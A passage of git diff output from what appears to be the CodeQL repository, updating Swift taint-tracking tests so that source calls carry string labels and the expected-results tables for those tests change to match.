conversions.swift:75:16:75:38 | call to sourceString(_:) | conversions.swift:75:12:75:51 | ...! | result | +| conversions.swift:77:12:77:50 | call to Self.init(littleEndian:) | conversions.swift:77:30:77:49 | call to sourceInt(_:) | conversions.swift:77:12:77:50 | call to Self.init(littleEndian:) | result | +| conversions.swift:78:12:78:47 | call to Self.init(bigEndian:) | conversions.swift:78:27:78:46 | call to sourceInt(_:) | conversions.swift:78:12:78:47 | call to Self.init(bigEndian:) | result | +| conversions.swift:79:12:79:33 | .littleEndian | conversions.swift:79:12:79:31 | call to sourceInt(_:) | conversions.swift:79:12:79:33 | .littleEndian | result | +| conversions.swift:80:12:80:33 | .bigEndian | conversions.swift:80:12:80:31 | call to sourceInt(_:) | conversions.swift:80:12:80:33 | .bigEndian | result | +| conversions.swift:108:12:108:33 | call to sourceFloat(_:) | conversions.swift:108:12:108:33 | call to sourceFloat(_:) | conversions.swift:108:12:108:33 | call to sourceFloat(_:) | result | +| conversions.swift:109:12:109:40 | call to Float.init(_:) | conversions.swift:109:18:109:39 | call to sourceFloat(_:) | conversions.swift:109:12:109:40 | call to Float.init(_:) | result | +| conversions.swift:111:12:111:41 | call to String.init(_:) | conversions.swift:111:19:111:40 | call to sourceFloat(_:) | conversions.swift:111:12:111:41 | call to String.init(_:) | result | +| conversions.swift:112:12:112:43 | .utf8 | conversions.swift:112:19:112:40 | call to sourceFloat(_:) | conversions.swift:112:12:112:43 | .utf8 | result | +| conversions.swift:113:12:113:43 | call to String.init(_:) | conversions.swift:113:19:113:42 | call to sourceFloat80(_:) | conversions.swift:113:12:113:43 | call to String.init(_:) | result | +| conversions.swift:114:12:114:45 | .utf8 | conversions.swift:114:19:114:42 | call to sourceFloat80(_:) | conversions.swift:114:12:114:45 | .utf8 | result | +| conversions.swift:115:12:115:42 | call to String.init(_:) | conversions.swift:115:19:115:41 | call to sourceDouble(_:) | conversions.swift:115:12:115:42 | call to String.init(_:) | result | +| conversions.swift:116:12:116:44 | .utf8 | conversions.swift:116:19:116:41 | call to sourceDouble(_:) | conversions.swift:116:12:116:44 | .utf8 | result | +| conversions.swift:118:12:118:40 | call to Float.init(_:) | conversions.swift:118:18:118:39 | call to sourceFloat(_:) | conversions.swift:118:12:118:40 | call to Float.init(_:) | result | +| conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | conversions.swift:119:41:119:60 | call to sourceInt(_:) | conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | result | +| conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | conversions.swift:120:57:120:78 | call to sourceFloat(_:) | conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | result | +| conversions.swift:122:12:122:66 | call to Float.init(signOf:magnitudeOf:) | conversions.swift:122:44:122:65 | call to sourceFloat(_:) | conversions.swift:122:12:122:66 | call to Float.init(signOf:magnitudeOf:) | result | +| conversions.swift:124:12:124:35 | .exponent | conversions.swift:124:12:124:33 | call to sourceFloat(_:) | conversions.swift:124:12:124:35 | .exponent | result | +| conversions.swift:125:12:125:35 | .significand | conversions.swift:125:12:125:33 | call to sourceFloat(_:) | conversions.swift:125:12:125:35 | .significand | result | +| conversions.swift:126:12:126:37 | .exponent | conversions.swift:126:12:126:35 | call to sourceFloat80(_:) | conversions.swift:126:12:126:37 | .exponent | result | +| conversions.swift:127:12:127:37 | .significand | conversions.swift:127:12:127:35 | call to sourceFloat80(_:) | conversions.swift:127:12:127:37 | .significand | result | +| conversions.swift:128:12:128:36 | .exponent | conversions.swift:128:12:128:34 | call to sourceDouble(_:) | conversions.swift:128:12:128:36 | .exponent | result | +| conversions.swift:129:12:129:36 | .significand | conversions.swift:129:12:129:34 | call to sourceDouble(_:) | conversions.swift:129:12:129:36 | .significand | result | +| conversions.swift:135:12:135:35 | call to sourceString(_:) | conversions.swift:135:12:135:35 | call to sourceString(_:) | conversions.swift:135:12:135:35 | call to sourceString(_:) | result | +| conversions.swift:136:12:136:43 | call to String.init(_:) | conversions.swift:136:19:136:42 | call to sourceString(_:) | conversions.swift:136:12:136:43 | call to String.init(_:) | result | +| conversions.swift:145:12:145:12 | ms2 | conversions.swift:144:21:144:44 | call to sourceString(_:) | conversions.swift:145:12:145:12 | ms2 | result | +| conversions.swift:146:12:146:16 | .description | conversions.swift:144:21:144:44 | call to sourceString(_:) | conversions.swift:146:12:146:16 | .description | result | +| conversions.swift:147:12:147:16 | .debugDescription | conversions.swift:144:21:144:44 | call to sourceString(_:) | conversions.swift:147:12:147:16 | .debugDescription | result | +| conversions.swift:153:12:153:12 | parent | conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:153:12:153:12 | parent | result | +| conversions.swift:154:12:154:12 | parent | conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:154:12:154:12 | parent | result | +| conversions.swift:157:12:157:12 | v3 | conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:157:12:157:12 | v3 | result | +| conversions.swift:158:12:158:12 | v3 | conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:158:12:158:12 | v3 | result | | conversions.swift:173:13:173:13 | arr1 | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:173:13:173:13 | arr1 | result | -| conversions.swift:174:13:174:13 | arr2 | conversions.swift:172:15:172:25 | call to sourceInt() | conversions.swift:174:13:174:13 | arr2 | result | +| conversions.swift:174:13:174:13 | arr2 | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:174:13:174:13 | arr2 | result | | conversions.swift:175:13:175:19 | ...[...] | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:175:13:175:19 | ...[...] | result | -| conversions.swift:176:13:176:19 | ...[...] | conversions.swift:172:15:172:25 | call to sourceInt() | conversions.swift:176:13:176:19 | ...[...] | result | +| conversions.swift:176:13:176:19 | ...[...] | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:176:13:176:19 | ...[...] | result | | conversions.swift:180:13:180:13 | arr1b | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:180:13:180:13 | arr1b | result | -| conversions.swift:181:13:181:13 | arr2b | conversions.swift:172:15:172:25 | call to sourceInt() | conversions.swift:181:13:181:13 | arr2b | result | +| conversions.swift:181:13:181:13 | arr2b | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:181:13:181:13 | arr2b | result | | conversions.swift:182:13:182:20 | ...[...] | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:182:13:182:20 | ...[...] | result | -| conversions.swift:183:13:183:20 | ...[...] | conversions.swift:172:15:172:25 | call to sourceInt() | conversions.swift:183:13:183:20 | ...[...] | result | +| conversions.swift:183:13:183:20 | ...[...] | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:183:13:183:20 | ...[...] | result | | conversions.swift:187:13:187:13 | arr1c | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:187:13:187:13 | arr1c | result | -| conversions.swift:188:13:188:13 | arr2c | conversions.swift:172:15:172:25 | call to sourceInt() | conversions.swift:188:13:188:13 | arr2c | result | +| conversions.swift:188:13:188:13 | arr2c | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:188:13:188:13 | arr2c | result | | conversions.swift:189:13:189:20 | ...[...] | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:189:13:189:20 | ...[...] | result | -| conversions.swift:190:13:190:20 | ...[...] | conversions.swift:172:15:172:25 | call to sourceInt() | conversions.swift:190:13:190:20 | ...[...] | result | -| conversions.swift:206:13:206:13 | withUInt | conversions.swift:232:26:232:37 | call to sourceUInt() | conversions.swift:206:13:206:13 | withUInt | result | -| conversions.swift:212:13:212:25 | .v | conversions.swift:235:37:235:47 | call to sourceInt() | conversions.swift:212:13:212:25 | .v | result | -| conversions.swift:218:13:218:26 | .v | conversions.swift:238:38:238:48 | call to sourceInt() | conversions.swift:218:13:218:26 | .v | result | -| conversions.swift:221:12:221:12 | self | conversions.swift:238:38:238:48 | call to sourceInt() | conversions.swift:221:12:221:12 | self | result | -| conversions.swift:225:13:225:25 | .v | conversions.swift:241:43:241:53 | call to sourceInt() | conversions.swift:225:13:225:25 | .v | result | -| conversions.swift:238:12:238:50 | call to Int.init(withMyValue2:) | conversions.swift:238:38:238:48 | call to sourceInt() | conversions.swift:238:12:238:50 | call to Int.init(withMyValue2:) | result | -| conversions.swift:241:12:241:55 | call to mkInt(withMyValue:) | conversions.swift:241:43:241:53 | call to sourceInt() | conversions.swift:241:12:241:55 | call to mkInt(withMyValue:) | result | +| conversions.swift:190:13:190:20 | ...[...] | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:190:13:190:20 | ...[...] | result | +| conversions.swift:206:13:206:13 | withUInt | conversions.swift:232:26:232:43 | call to sourceUInt(_:) | conversions.swift:206:13:206:13 | withUInt | result | +| conversions.swift:212:13:212:25 | .v | conversions.swift:235:37:235:53 | call to sourceInt(_:) | conversions.swift:212:13:212:25 | .v | result | +| conversions.swift:218:13:218:26 | .v | conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:218:13:218:26 | .v | result | +| conversions.swift:221:12:221:12 | self | conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:221:12:221:12 | self | result | +| conversions.swift:225:13:225:25 | .v | conversions.swift:241:43:241:59 | call to sourceInt(_:) | conversions.swift:225:13:225:25 | .v | result | +| conversions.swift:238:12:238:56 | call to Int.init(withMyValue2:) | conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:238:12:238:56 | call to Int.init(withMyValue2:) | result | +| conversions.swift:241:12:241:61 | call to mkInt(withMyValue:) | conversions.swift:241:43:241:59 | call to sourceInt(_:) | conversions.swift:241:12:241:61 | call to mkInt(withMyValue:) | result | | simple.swift:12:13:12:24 | ... .+(_:_:) ... | simple.swift:12:17:12:24 | call to source() | simple.swift:12:13:12:24 | ... .+(_:_:) ... | result | | simple.swift:13:13:13:24 | ... .+(_:_:) ... | simple.swift:13:13:13:20 | call to source() | simple.swift:13:13:13:24 | ... .+(_:_:) ... | result | | simple.swift:14:13:14:24 | ... .-(_:_:) ... | simple.swift:14:17:14:24 | call to source() | simple.swift:14:13:14:24 | ... .-(_:_:) ... | result | diff --git a/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected index 2a6b89d244c..0e6a9b75bcb 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected @@ -1,17 +1,17 @@ testFailures -| conversions.swift:33:30:34:1 | // $ tainted=33\n | Missing result: tainted=33 | -| conversions.swift:34:32:35:1 | // $ tainted=34\n | Missing result: tainted=34 | -| conversions.swift:58:16:59:1 | // $ tainted=57\n | Missing result: tainted=57 | -| conversions.swift:61:16:62:1 | // $ tainted=60\n | Missing result: tainted=60 | -| conversions.swift:69:42:70:1 | // $ tainted=69\n | Missing result: tainted=69 | -| conversions.swift:71:40:72:1 | // $ tainted=71\n | Missing result: tainted=71 | -| conversions.swift:72:43:73:1 | // $ tainted=72\n | Missing result: tainted=72 | -| conversions.swift:73:40:74:1 | // $ tainted=73\n | Missing result: tainted=73 | -| conversions.swift:74:50:75:1 | // $ tainted=74\n | Missing result: tainted=74 | -| conversions.swift:110:34:111:1 | // $ tainted=110\n | Missing result: tainted=110 | -| conversions.swift:130:38:131:1 | // $ tainted=130\n | Missing result: tainted=130 | -| conversions.swift:131:40:132:1 | // $ tainted=131\n | Missing result: tainted=131 | -| conversions.swift:166:38:167:1 | // $ tainted=166\n | Missing result: tainted=166 | -| conversions.swift:208:18:209:1 | // $ tainted=232\n | Missing result: tainted=232 | -| conversions.swift:232:41:233:1 | // $ tainted=232\n | Missing result: tainted=232 | +| conversions.swift:33:39:34:1 | // $ tainted=conv1-2\n | Missing result: tainted=conv1-2 | +| conversions.swift:34:41:35:1 | // $ tainted=conv1-3\n | Missing result: tainted=conv1-3 | +| conversions.swift:58:16:59:1 | // $ tainted=conv3-4\n | Missing result: tainted=conv3-4 | +| conversions.swift:61:16:62:1 | // $ tainted=conv3-5\n | Missing result: tainted=conv3-5 | +| conversions.swift:69:51:70:1 | // $ tainted=conv3-7\n | Missing result: tainted=conv3-7 | +| conversions.swift:71:49:72:1 | // $ tainted=conv4-1\n | Missing result: tainted=conv4-1 | +| conversions.swift:72:52:73:1 | // $ tainted=conv4-2\n | Missing result: tainted=conv4-2 | +| conversions.swift:73:49:74:1 | // $ tainted=conv4-3\n | Missing result: tainted=conv4-3 | +| conversions.swift:74:59:75:1 | // $ tainted=conv4-4\n | Missing result: tainted=conv4-4 | +| conversions.swift:110:43:111:1 | // $ tainted=conv7-3\n | Missing result: tainted=conv7-3 | +| conversions.swift:130:47:131:1 | // $ tainted=conv9-7\n | Missing result: tainted=conv9-7 | +| conversions.swift:131:49:132:1 | // $ tainted=conv9-8\n | Missing result: tainted=conv9-8 | +| conversions.swift:166:45:167:1 | // $ tainted=cenum\n | Missing result: tainted=cenum | +| conversions.swift:208:18:209:1 | // $ tainted=ext1\n | Missing result: tainted=ext1 | +| conversions.swift:232:47:233:1 | // $ tainted=ext1\n | Missing result: tainted=ext1 | failures diff --git a/swift/ql/test/library-tests/dataflow/taint/core/conversions.swift b/swift/ql/test/library-tests/dataflow/taint/core/conversions.swift index dc4b59ef062..910ee45a526 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/conversions.swift +++ b/swift/ql/test/library-tests/dataflow/taint/core/conversions.swift @@ -1,11 +1,11 @@ -func sourceInt() -> Int { 0 } -func sourceUInt() -> UInt { 0 } -func sourceUInt64() -> UInt64 { 0 } -func sourceFloat() -> Float { 0.0 } -func sourceFloat80() -> Float80 { 0.0 } -func sourceDouble() -> Double { 0.0 } -func sourceString() -> String { "" } +func sourceInt(_ label: String) -> Int { 0 } +func sourceUInt(_ label: String) -> UInt { 0 } +func sourceUInt64(_ label: String) -> UInt64 { 0 } +func sourceFloat(_ label: String) -> Float { 0.0 } +func sourceFloat80(_ label: String) -> Float80 { 0.0 } +func sourceDouble(_ label: String) -> Double { 0.0 } +func sourceString(_ label: String) -> String { "" } func sourceArray(_ label: String) -> [Int] { [] } func sink(arg: Any) { } @@ -29,111 +29,111 @@ class MyString : LosslessStringConvertible, CustomStringConvertible, CustomDebug typealias MyInt = Int func testConversions() { - sink(arg: sourceInt()) // $ tainted=32 - sink(arg: Int(sourceInt())) // $ tainted=33 - sink(arg: UInt8(sourceInt())) // $ tainted=34 - sink(arg: Float(sourceInt())) // $ tainted=35 - sink(arg: String(sourceInt())) // $ tainted=36 - sink(arg: String(sourceInt()).utf8) // $ tainted=37 + sink(arg: sourceInt("conv1-1")) // $ tainted=conv1-1 + sink(arg: Int(sourceInt("conv1-2"))) // $ tainted=conv1-2 + sink(arg: UInt8(sourceInt("conv1-3"))) // $ tainted=conv1-3 + sink(arg: Float(sourceInt("conv1-4"))) // $ tainted=conv1-4 + sink(arg: String(sourceInt("conv1-5"))) // $ tainted=conv1-5 + sink(arg: String(sourceInt("conv1-6")).utf8) // $ tainted=conv1-6 - let arr = [1, 2, sourceInt()] - sink(arg: arr) // $ tainted=39 - sink(arg: arr[0]) // $ tainted=39 - sink(arg: [MyInt](arr)) // $ tainted=39 - sink(arg: [MyInt](arr)[0]) // $ tainted=39 - sink(arg: [UInt8](sourceString().utf8)) // $ tainted=44 - sink(arg: [UInt8](sourceString().utf8)[0]) // $ tainted=45 + let arr = [1, 2, sourceInt("conv2-1")] + sink(arg: arr) // $ tainted=conv2-1 + sink(arg: arr[0]) // $ tainted=conv2-1 + sink(arg: [MyInt](arr)) // $ tainted=conv2-1 + sink(arg: [MyInt](arr)[0]) // $ tainted=conv2-1 + sink(arg: [UInt8](sourceString("conv2-2").utf8)) // $ tainted=conv2-2 + sink(arg: [UInt8](sourceString("conv2-3").utf8)[0]) // $ tainted=conv2-3 - if let v = sourceInt() as? UInt { - sink(arg: v) // $ tainted=47 + if let v = sourceInt("conv3-1") as? UInt { + sink(arg: v) // $ tainted=conv3-1 } - let v2: UInt8 = numericCast(sourceInt()) - sink(arg: v2) // $ tainted=51 + let v2: UInt8 = numericCast(sourceInt("conv3-2")) + sink(arg: v2) // $ tainted=conv3-2 - let v4: UInt = unsafeBitCast(sourceInt(), to: UInt.self) - sink(arg: v4) // $ tainted=54 + let v4: UInt = unsafeBitCast(sourceInt("conv3-3"), to: UInt.self) + sink(arg: v4) // $ tainted=conv3-3 - let v5 = UInt(truncatingIfNeeded: sourceInt()) - sink(arg: v5) // $ tainted=57 + let v5 = UInt(truncatingIfNeeded: sourceInt("conv3-4")) + sink(arg: v5) // $ tainted=conv3-4 - let v6 = UInt(bitPattern: sourceInt()) - sink(arg: v6) // $ tainted=60 + let v6 = UInt(bitPattern: sourceInt("conv3-5")) + sink(arg: v6) // $ tainted=conv3-5 - let v7 = abs(sourceInt()) - sink(arg: v7) // $ tainted=63 + let v7 = abs(sourceInt("conv3-6")) + sink(arg: v7) // $ tainted=conv3-6 let v8 = UInt64(0) sink(arg: v8) sink(arg: v8.advanced(by: 1)) - sink(arg: v8.advanced(by: sourceInt())) // $ tainted=69 + sink(arg: v8.advanced(by: sourceInt("conv3-7"))) // $ tainted=conv3-7 - sink(arg: Int(exactly: sourceInt())!) // $ tainted=71 - sink(arg: UInt32(exactly: sourceInt())!) // $ tainted=72 - sink(arg: Int(clamping: sourceInt())) // $ tainted=73 - sink(arg: Int(truncatingIfNeeded: sourceInt())) // $ tainted=74 - sink(arg: Int(sourceString(), radix: 10)!) // $ tainted=75 + sink(arg: Int(exactly: sourceInt("conv4-1"))!) // $ tainted=conv4-1 + sink(arg: UInt32(exactly: sourceInt("conv4-2"))!) // $ tainted=conv4-2 + sink(arg: Int(clamping: sourceInt("conv4-3"))) // $ tainted=conv4-3 + sink(arg: Int(truncatingIfNeeded: sourceInt("conv4-4"))) // $ tainted=conv4-4 + sink(arg: Int(sourceString("conv4-5"), radix: 10)!) // $ tainted=conv4-5 - sink(arg: Int(littleEndian: sourceInt())) // $ tainted=77 - sink(arg: Int(bigEndian: sourceInt())) // $ tainted=78 - sink(arg: sourceInt().littleEndian) // $ tainted=79 - sink(arg: sourceInt().bigEndian) // $ tainted=80 + sink(arg: Int(littleEndian: sourceInt("conv5-1"))) // $ tainted=conv5-1 + sink(arg: Int(bigEndian: sourceInt("conv5-2"))) // $ tainted=conv5-2 + sink(arg: sourceInt("conv5-3").littleEndian) // $ tainted=conv5-3 + sink(arg: sourceInt("conv5-4").bigEndian) // $ tainted=conv5-4 let (q1, r1) = 1000.quotientAndRemainder(dividingBy: 2) sink(arg: q1) sink(arg: r1) - let (q2, r2) = sourceInt().quotientAndRemainder(dividingBy: 2) - sink(arg: q2) // $ MISSING: tainted=86 - sink(arg: r2) // $ MISSING: tainted=86 + let (q2, r2) = sourceInt("conv6-1").quotientAndRemainder(dividingBy: 2) + sink(arg: q2) // $ MISSING: tainted=conv6-1 + sink(arg: r2) // $ MISSING: tainted=conv6-1 - let (q3, r3) = 1000.quotientAndRemainder(dividingBy: sourceInt()) - sink(arg: q3) // $ MISSING: tainted=90 - sink(arg: r3) // $ MISSING: tainted=90 + let (q3, r3) = 1000.quotientAndRemainder(dividingBy: sourceInt("conv6-2")) + sink(arg: q3) // $ MISSING: tainted=conv6-2 + sink(arg: r3) // $ MISSING: tainted=conv6-2 let pair1 = 1000.addingReportingOverflow(2) sink(arg: pair1.0) // part sink(arg: pair1.1) // overflow - let pair2 = sourceInt().addingReportingOverflow(2) - sink(arg: pair2.0) // $ MISSING: tainted=98 + let pair2 = sourceInt("conv6-3").addingReportingOverflow(2) + sink(arg: pair2.0) // $ MISSING: tainted=conv6-3 sink(arg: pair2.1) - let pair3 = 1000.addingReportingOverflow(sourceInt()) - sink(arg: pair3.0) // $ MISSING: tainted=102 + let pair3 = 1000.addingReportingOverflow(sourceInt("conv6-4")) + sink(arg: pair3.0) // $ MISSING: tainted=conv6-4 sink(arg: pair3.1) // --- - sink(arg: sourceFloat()) // $ tainted=108 - sink(arg: Float(sourceFloat())) // $ tainted=109 - sink(arg: UInt8(sourceFloat())) // $ tainted=110 - sink(arg: String(sourceFloat())) // $ tainted=111 - sink(arg: String(sourceFloat()).utf8) // $ tainted=112 - sink(arg: String(sourceFloat80())) // $ tainted=113 - sink(arg: String(sourceFloat80()).utf8) // $ tainted=114 - sink(arg: String(sourceDouble())) // $ tainted=115 - sink(arg: String(sourceDouble()).utf8) // $ tainted=116 + sink(arg: sourceFloat("conv7-1")) // $ tainted=conv7-1 + sink(arg: Float(sourceFloat("conv7-2"))) // $ tainted=conv7-2 + sink(arg: UInt8(sourceFloat("conv7-3"))) // $ tainted=conv7-3 + sink(arg: String(sourceFloat("conv7-4"))) // $ tainted=conv7-4 + sink(arg: String(sourceFloat("conv7-5")).utf8) // $ tainted=conv7-5 + sink(arg: String(sourceFloat80("conv7-6"))) // $ tainted=conv7-6 + sink(arg: String(sourceFloat80("conv7-7")).utf8) // $ tainted=conv7-7 + sink(arg: String(sourceDouble("conv7-8"))) // $ tainted=conv7-8 + sink(arg: String(sourceDouble("conv7-9")).utf8) // $ tainted=conv7-9 - sink(arg: Float(sourceFloat())) // $ tainted=118 - sink(arg: Float(sign: .plus, exponent: sourceInt(), significand: 0.0)) // $ tainted=119 - sink(arg: Float(sign: .plus, exponent: 0, significand: sourceFloat())) // $ tainted=120 - sink(arg: Float(signOf: sourceFloat(), magnitudeOf: 0.0)) // (good) - sink(arg: Float(signOf: 0.0, magnitudeOf: sourceFloat())) // $ tainted=122 + sink(arg: Float(sourceFloat("conv8-1"))) // $ tainted=conv8-1 + sink(arg: Float(sign: .plus, exponent: sourceInt("conv8-2"), significand: 0.0)) // $ tainted=conv8-2 + sink(arg: Float(sign: .plus, exponent: 0, significand: sourceFloat("conv8-3"))) // $ tainted=conv8-3 + sink(arg: Float(signOf: sourceFloat("conv8-4"), magnitudeOf: 0.0)) // (good) + sink(arg: Float(signOf: 0.0, magnitudeOf: sourceFloat("conv8-5"))) // $ tainted=conv8-5 - sink(arg: sourceFloat().exponent) // $ tainted=124 - sink(arg: sourceFloat().significand) // $ tainted=125 - sink(arg: sourceFloat80().exponent) // $ tainted=126 - sink(arg: sourceFloat80().significand) // $ tainted=127 - sink(arg: sourceDouble().exponent) // $ tainted=128 - sink(arg: sourceDouble().significand) // $ tainted=129 - sink(arg: sourceUInt().byteSwapped) // $ tainted=130 - sink(arg: sourceUInt64().byteSwapped) // $ tainted=131 + sink(arg: sourceFloat("conv9-1").exponent) // $ tainted=conv9-1 + sink(arg: sourceFloat("conv9-2").significand) // $ tainted=conv9-2 + sink(arg: sourceFloat80("conv9-3").exponent) // $ tainted=conv9-3 + sink(arg: sourceFloat80("conv9-4").significand) // $ tainted=conv9-4 + sink(arg: sourceDouble("conv9-5").exponent) // $ tainted=conv9-5 + sink(arg: sourceDouble("conv9-6").significand) // $ tainted=conv9-6 + sink(arg: sourceUInt("conv9-7").byteSwapped) // $ tainted=conv9-7 + sink(arg: sourceUInt64("conv9-8").byteSwapped) // $ tainted=conv9-8 // --- - sink(arg: sourceString()) // $ tainted=135 - sink(arg: String(sourceString())) // $ tainted=136 + sink(arg: sourceString("conv10-1")) // $ tainted=conv10-1 + sink(arg: String(sourceString("conv10-2"))) // $ tainted=conv10-2 let ms1 = MyString("abc")! sink(arg: ms1) @@ -141,21 +141,21 @@ func testConversions() { sink(arg: ms1.debugDescription) sink(arg: ms1.clean) - let ms2 = MyString(sourceString())! - sink(arg: ms2) // $ tainted=144 - sink(arg: ms2.description) // $ tainted=144 - sink(arg: ms2.debugDescription) // $ tainted=144 + let ms2 = MyString(sourceString("conv11-1"))! + sink(arg: ms2) // $ tainted=conv11-1 + sink(arg: ms2.description) // $ tainted=conv11-1 + sink(arg: ms2.debugDescription) // $ tainted=conv11-1 sink(arg: ms2.clean) // --- - let parent : MyParentClass = sourceString() as! MyChildClass - sink(arg: parent) // $ tainted=152 - sink(arg: parent as! MyChildClass) // $ tainted=152 + let parent : MyParentClass = sourceString("conv12-1") as! MyChildClass + sink(arg: parent) // $ tainted=conv12-1 + sink(arg: parent as! MyChildClass) // $ tainted=conv12-1 let v3: MyChildClass = unsafeDowncast(parent, to: MyChildClass.self) - sink(arg: v3) // $ tainted=152 - sink(arg: v3 as! MyParentClass) // $ tainted=152 + sink(arg: v3) // $ tainted=conv12-1 + sink(arg: v3 as! MyParentClass) // $ tainted=conv12-1 } var myCEnumConst : Int = 0 @@ -163,31 +163,31 @@ typealias MyCEnumType = UInt32 func testCEnum() { sink(arg: MyCEnumType(myCEnumConst)) - sink(arg: MyCEnumType(sourceInt())) // $ tainted=166 + sink(arg: MyCEnumType(sourceInt("cenum"))) // $ tainted=cenum } class TestArrayConversion { init() { let arr1 = sourceArray("init1") - let arr2 = [sourceInt()] + let arr2 = [sourceInt("init2")] sink(arg: arr1) // $ tainted=init1 - sink(arg: arr2) // $ tainted=172 + sink(arg: arr2) // $ tainted=init2 sink(arg: arr1[0]) // $ tainted=init1 - sink(arg: arr2[0]) // $ tainted=172 + sink(arg: arr2[0]) // $ tainted=init2 let arr1b = try Array(arr1) let arr2b = try Array(arr2) sink(arg: arr1b) // $ tainted=init1 - sink(arg: arr2b) // $ tainted=172 + sink(arg: arr2b) // $ tainted=init2 sink(arg: arr1b[0]) // $ tainted=init1 - sink(arg: arr2b[0]) // $ tainted=172 + sink(arg: arr2b[0]) // $ tainted=init2 let arr1c = ContiguousArray(arr1) let arr2c = ContiguousArray(arr2) sink(arg: arr1c) // $ tainted=init1 - sink(arg: arr2c) // $ tainted=172 + sink(arg: arr2c) // $ tainted=init2 sink(arg: arr1c[0]) // $ tainted=init1 - sink(arg: arr2c[0]) // $ tainted=172 + sink(arg: arr2c[0]) // $ tainted=init2 } } @@ -203,40 +203,40 @@ class MyValue { extension Int { init(withUInt: UInt) { - sink(arg: withUInt) // $ tainted=232 + sink(arg: withUInt) // $ tainted=ext1 self = Int(withUInt) - sink(arg:self) // $ tainted=232 + sink(arg:self) // $ tainted=ext1 } init(withMyValue: MyValue) { - sink(arg: withMyValue.v) // $ tainted=235 + sink(arg: withMyValue.v) // $ tainted=ext2 self = withMyValue.v - sink(arg:self) // $ MISSING: tainted=235 + sink(arg:self) // $ MISSING: tainted=ext2 } init(withMyValue2: MyValue) { - sink(arg: withMyValue2.v) // $ tainted=238 + sink(arg: withMyValue2.v) // $ tainted=ext3 let x = withMyValue2.v self = x - sink(arg:self) // $ tainted=238 + sink(arg:self) // $ tainted=ext3 } static func mkInt(withMyValue: MyValue) -> Int { - sink(arg: withMyValue.v) // $ tainted=241 + sink(arg: withMyValue.v) // $ tainted=ext4 return withMyValue.v } } func testIntExtensions() { sink(arg: Int(withUInt: 0)) - sink(arg: Int(withUInt: sourceUInt())) // $ tainted=232 + sink(arg: Int(withUInt: sourceUInt("ext1"))) // $ tainted=ext1 sink(arg: Int(withMyValue: MyValue(0))) - sink(arg: Int(withMyValue: MyValue(sourceInt()))) // $ MISSING: tainted=235 + sink(arg: Int(withMyValue: MyValue(sourceInt("ext2")))) // $ MISSING: tainted=ext2 sink(arg: Int(withMyValue2: MyValue(0))) - sink(arg: Int(withMyValue2: MyValue(sourceInt()))) // $ tainted=238 + sink(arg: Int(withMyValue2: MyValue(sourceInt("ext3")))) // $ tainted=ext3 sink(arg: Int.mkInt(withMyValue: MyValue(0))) - sink(arg: Int.mkInt(withMyValue: MyValue(sourceInt()))) // $ tainted=241 + sink(arg: Int.mkInt(withMyValue: MyValue(sourceInt("ext4")))) // $ tainted=ext4 } From 570393fe2bd6426d435dfaf32f60d39f185bc365 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 14 Nov 2024 16:21:14 +0000 Subject: [PATCH 0699/1267] Swift: Additional test cases. --- .../dataflow/taint/core/LocalTaint.expected | 494 ++++++------ .../dataflow/taint/core/Taint.expected | 748 +++++++++--------- .../dataflow/taint/core/TaintInline.expected | 41 +- .../dataflow/taint/core/conversions.swift | 56 +- 4 files changed, 714 insertions(+), 625 deletions(-) diff --git a/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected b/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected index c0a08c715a8..a25101527f5 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected @@ -17,243 +17,263 @@ | conversions.swift:25:33:25:33 | self | conversions.swift:25:33:25:33 | SSA def(self) | | conversions.swift:26:22:26:22 | SSA def(self) | conversions.swift:26:22:26:38 | self[return] | | conversions.swift:26:22:26:22 | self | conversions.swift:26:22:26:22 | SSA def(self) | -| conversions.swift:35:18:35:37 | call to sourceInt(_:) | conversions.swift:35:12:35:38 | call to Float.init(_:) | -| conversions.swift:36:19:36:38 | call to sourceInt(_:) | conversions.swift:36:12:36:39 | call to String.init(_:) | -| conversions.swift:37:12:37:39 | call to String.init(_:) | conversions.swift:37:12:37:41 | .utf8 | -| conversions.swift:37:19:37:38 | call to sourceInt(_:) | conversions.swift:37:12:37:39 | call to String.init(_:) | -| conversions.swift:39:6:39:6 | SSA def(arr) | conversions.swift:40:12:40:12 | arr | -| conversions.swift:39:6:39:6 | arr | conversions.swift:39:6:39:6 | SSA def(arr) | -| conversions.swift:39:12:39:39 | [...] | conversions.swift:39:6:39:6 | arr | -| conversions.swift:40:12:40:12 | arr | conversions.swift:41:12:41:12 | arr | -| conversions.swift:41:12:41:12 | [post] arr | 